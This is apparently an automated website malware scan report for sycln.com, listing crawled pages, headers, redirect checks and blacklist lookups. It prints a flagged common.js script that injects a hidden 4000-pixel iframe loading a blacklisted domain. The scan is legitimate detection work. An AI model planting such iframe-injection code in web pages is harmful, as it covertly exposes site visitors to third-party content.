Scanned pages/files
Request | Server response | Status |
http://sycln.com/ | HTTP/1.1 200 OK Date: Thu, 24 Jul 2014 23:01:08 GMT Accept-Ranges: bytes ETag: "30c5a775e3a6cf1:301" Server: Microsoft-IIS/6.0 Content-Length: 12794 Content-Location: http://sycln.com/index.html Content-Type: text/html Last-Modified: Thu, 24 Jul 2014 02:03:27 GMT X-Powered-By: ASP.NET | clean |
http://sycln.com/index.html | 200 OK Content-Length: 12794 Content-Type: text/html | clean |
http://sycln.com/common.js | 200 OK Content-Length: 280 Content-Type: application/x-javascript | malicious |
Malicious code found. Script contains blacklisted domain: www.1581588.com var gotourl = "http://www.1581588.com/";
document.writeln("<div style=\"background-color:#FFF;\"><IFRAME border=0 name=I1 align=center marginWidth=0 src=\""+gotourl+"\" frameBorder=0 width=\"100%\" scrolling=no height=4000 target=\"_blank\" target=\"_blank\"><\/IFRAME><\/div>"); Decoded script: <div style="background-color:#FFF;"><IFRAME border=0 name=I1 align=center marginWidth=0 src="http://www.1581588.com/" frameBorder=0 width="100%" scrolling=no height=4000 target="_blank" target="_blank"></IFRAME></div> | ||
http://sycln.com/tj.js | 200 OK Content-Length: 120 Content-Type: application/x-javascript | clean |
http://sycln.com/sitemap.html | 200 OK Content-Length: 35990 Content-Type: text/html | clean |
http://sycln.com/m7d89/ | HTTP/1.1 200 OK Date: Thu, 24 Jul 2014 23:01:12 GMT Accept-Ranges: bytes ETag: "9cc9d8c29a6cf1:301" Server: Microsoft-IIS/6.0 Content-Length: 13579 Content-Location: http://sycln.com/m7d89/index.html Content-Type: text/html Last-Modified: Wed, 23 Jul 2014 00:05:07 GMT X-Powered-By: ASP.NET | clean |
http://sycln.com/m7d89/index.html | 200 OK Content-Length: 13579 Content-Type: text/html | clean |
http://sycln.com/lgz58/ | HTTP/1.1 200 OK Date: Thu, 24 Jul 2014 23:01:13 GMT Accept-Ranges: bytes ETag: "a667916ee3a6cf1:301" Server: Microsoft-IIS/6.0 Content-Length: 13606 Content-Location: http://sycln.com/lgz58/index.html Content-Type: text/html Last-Modified: Thu, 24 Jul 2014 02:03:15 GMT X-Powered-By: ASP.NET | clean |
http://sycln.com/lgz58/index.html | 200 OK Content-Length: 13606 Content-Type: text/html | clean |
http://sycln.com/vbxp5/ | HTTP/1.1 200 OK Date: Thu, 24 Jul 2014 23:01:15 GMT Accept-Ranges: bytes ETag: "387d355496a4cf1:301" Server: Microsoft-IIS/6.0 Content-Length: 13376 Content-Location: http://sycln.com/vbxp5/index.html Content-Type: text/html Last-Modified: Mon, 21 Jul 2014 03:46:18 GMT X-Powered-By: ASP.NET | clean |
http://sycln.com/vbxp5/index.html | 200 OK Content-Length: 13376 Content-Type: text/html | clean |
http://sycln.com/li5gl/ | HTTP/1.1 200 OK Date: Thu, 24 Jul 2014 23:01:16 GMT Accept-Ranges: bytes ETag: "5813e2dedda6cf1:301" Server: Microsoft-IIS/6.0 Content-Length: 13479 Content-Location: http://sycln.com/li5gl/index.html Content-Type: text/html Last-Modified: Thu, 24 Jul 2014 01:23:27 GMT X-Powered-By: ASP.NET | clean |
http://sycln.com/li5gl/index.html | 200 OK Content-Length: 13479 Content-Type: text/html | clean |
http://sycln.com/li5gl/147.html | 200 OK Content-Length: 16908 Content-Type: text/html | clean |
http://sycln.com/lgz58/146.html | 200 OK Content-Length: 16982 Content-Type: text/html | clean |
http://sycln.com/li5gl/145.html | 200 OK Content-Length: 17096 Content-Type: text/html | clean |
http://sycln.com/m7d89/144.html | 200 OK Content-Length: 17119 Content-Type: text/html | clean |
http://sycln.com/li5gl/143.html | 200 OK Content-Length: 16812 Content-Type: text/html | clean |
http://sycln.com/li5gl/142.html | 200 OK Content-Length: 17094 Content-Type: text/html | clean |
http://sycln.com/li5gl/141.html | 200 OK Content-Length: 16770 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: sycln.com
Result:
HTTP/1.1 200 OK
Date: Thu, 24 Jul 2014 23:01:08 GMT
Accept-Ranges: bytes
ETag: "30c5a775e3a6cf1:301"
Server: Microsoft-IIS/6.0
Content-Length: 12794
Content-Location: http://sycln.com/index.html
Content-Type: text/html
Last-Modified: Thu, 24 Jul 2014 02:03:27 GMT
X-Powered-By: ASP.NET
...12794 bytes of data.
GET / HTTP/1.1
Host: sycln.com
Result:
HTTP/1.1 200 OK
Date: Thu, 24 Jul 2014 23:01:08 GMT
Accept-Ranges: bytes
ETag: "30c5a775e3a6cf1:301"
Server: Microsoft-IIS/6.0
Content-Length: 12794
Content-Location: http://sycln.com/index.html
Content-Type: text/html
Last-Modified: Thu, 24 Jul 2014 02:03:27 GMT
X-Powered-By: ASP.NET
...12794 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: sycln.com
Referer: http://www.google.com/search?q=sycln.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: sycln.com
Referer: http://www.google.com/search?q=sycln.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=sycln.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://sycln.com/
Result: sycln.com is not infected or malware details are not published yet.
Result: sycln.com is not infected or malware details are not published yet.